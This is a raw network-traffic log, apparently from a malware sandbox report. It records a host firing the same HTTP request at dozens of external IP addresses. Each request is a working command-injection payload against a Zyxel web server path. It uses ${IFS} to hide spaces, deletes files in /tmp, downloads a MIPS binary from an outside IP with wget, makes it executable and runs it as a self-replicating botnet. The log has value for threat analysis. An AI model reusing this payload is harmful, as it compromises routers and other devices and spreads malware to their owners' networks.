                                                Jan 12, 2024 18:24:49.177943945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7876192.168.2.1341240175.172.200.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.177993059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7877192.168.2.1355796112.226.138.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.178009987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7878192.168.2.1340670116.195.50.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.178064108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7879192.168.2.1346590183.188.207.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.178106070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7880192.168.2.1356394130.127.81.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.178141117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7881192.168.2.134218841.119.9.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.178191900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7882192.168.2.135853218.246.107.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.178229094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7883192.168.2.135762845.115.151.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.178297997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7884192.168.2.1335348112.239.162.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.178332090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7885192.168.2.1333130104.172.19.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.178368092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7886192.168.2.1335846188.78.175.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.178417921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7887192.168.2.1351978171.198.154.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.178451061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7888192.168.2.1333154202.243.109.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.178492069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7889192.168.2.134593689.250.244.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.178535938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7890192.168.2.134969264.221.75.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.178561926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7891192.168.2.1351234222.186.132.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.178610086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7892192.168.2.1345164118.249.169.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.178653002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7893192.168.2.133491241.213.131.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.178688049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7894192.168.2.1355918129.62.210.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.178734064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7895192.168.2.1353588208.226.247.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.178766012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7896192.168.2.134995080.17.228.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.178819895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7897192.168.2.1336152221.191.149.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.178854942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7898192.168.2.1340366200.112.179.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.178884983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7899192.168.2.1342916206.35.59.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.178941011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7900192.168.2.1347714156.49.69.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.178970098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7901192.168.2.1341610143.245.71.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179033995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7902192.168.2.1349716196.81.207.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179059982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7903192.168.2.133427842.210.35.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179090977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7904192.168.2.133963434.25.250.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179130077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7905192.168.2.135433690.6.170.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179179907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7906192.168.2.13370729.190.232.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179214001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7907192.168.2.133821425.244.168.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179272890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7908192.168.2.1339822218.202.145.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179311991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7909192.168.2.135182457.218.152.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179337978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7910192.168.2.1359224137.238.113.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179369926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7911192.168.2.135247853.18.60.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179408073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7912192.168.2.133776477.138.94.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179441929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7913192.168.2.1342454191.123.5.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179477930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7914192.168.2.134352634.198.211.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179532051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7915192.168.2.1342194155.64.253.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179563046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7916192.168.2.133948049.225.207.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179600954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7917192.168.2.133399662.66.200.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179650068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7918192.168.2.1349258199.120.201.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179692030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7919192.168.2.1339110105.251.209.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179718018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7920192.168.2.135036420.211.230.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179758072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7921192.168.2.1348002156.6.178.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179805994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7922192.168.2.1335394203.178.220.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179835081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7923192.168.2.135219277.2.29.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179876089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7924192.168.2.1335336165.237.185.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179913044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7925192.168.2.133859472.183.210.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179939032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7926192.168.2.1346588223.184.71.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.179982901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7927192.168.2.1332900104.105.88.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.180027008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7928192.168.2.1357614209.109.110.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.180099964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7929192.168.2.134299890.61.57.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.180110931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7930192.168.2.1343374201.142.240.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.180161953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7931192.168.2.1358288106.129.133.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.180201054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7932192.168.2.1354210194.93.106.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.180248976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7933192.168.2.1349448216.26.87.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.180304050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7934192.168.2.134707812.59.65.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.180332899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7935192.168.2.1352062124.212.159.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.180367947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7936192.168.2.1333588174.146.123.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.180422068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7937192.168.2.1342068219.180.53.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.180453062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7938192.168.2.1360256209.204.189.69443
                                                TimestampBytes transferredDirectionData
